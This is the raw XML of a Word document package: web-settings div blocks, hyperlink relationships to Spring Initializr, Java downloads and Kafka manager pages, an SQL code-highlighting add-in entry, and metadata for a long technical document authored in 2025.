          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="88089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95997">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2126459810">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2128233173">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2129663295">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2130465316">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="934020159">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2131195063">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2131776136">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2133590735">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2136092531">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1017585476">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2136562966">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="650064529">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2136748976">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2137403531">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1303193476">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2139956442">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2145543208">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1491822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84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optium.net/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://start.spring.io/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:john.doe@gmail.com"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https://www.oracle.com/java/technologies/javase-downloads.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://start.spring.io/" TargetMode="External"/><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github.com/yahoo/CMAK" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.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tart.spring.io/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:jane.smith@yahoo.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://start.spring.io/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.com/"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sv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A35EAA0-34EE-4B83-8A6F-242D1381EEB6}">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23A887F-DF59-4B29-B90F-9526AA65902C}">
  <we:reference id="wa200000011" version="1.0.1.0" store="en-US" storeType="OMEX"/>
  <we:alternateReferences>
    <we:reference id="WA200000011" version="1.0.1.0" store="" storeType="OMEX"/>
  </we:alternateReferences>
  <we:properties>
    <we:property name="language" value="&quot;Sql&quot;"/>
    <we:property name="theme" value="&quot;Xcod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E39F9-03DA-48E0-9A2B-6351CE336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7</TotalTime>
  <Pages>1194</Pages>
  <Words>443288</Words>
  <Characters>2526748</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>21056</Lines>
  <Paragraphs>59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nt Patni</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Siddhant Patni</cp:lastModifiedBy>
  <cp:revision>6616</cp:revision>
  <cp:lastPrinted>2025-05-03T08:44:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-11T06:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-03T08:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>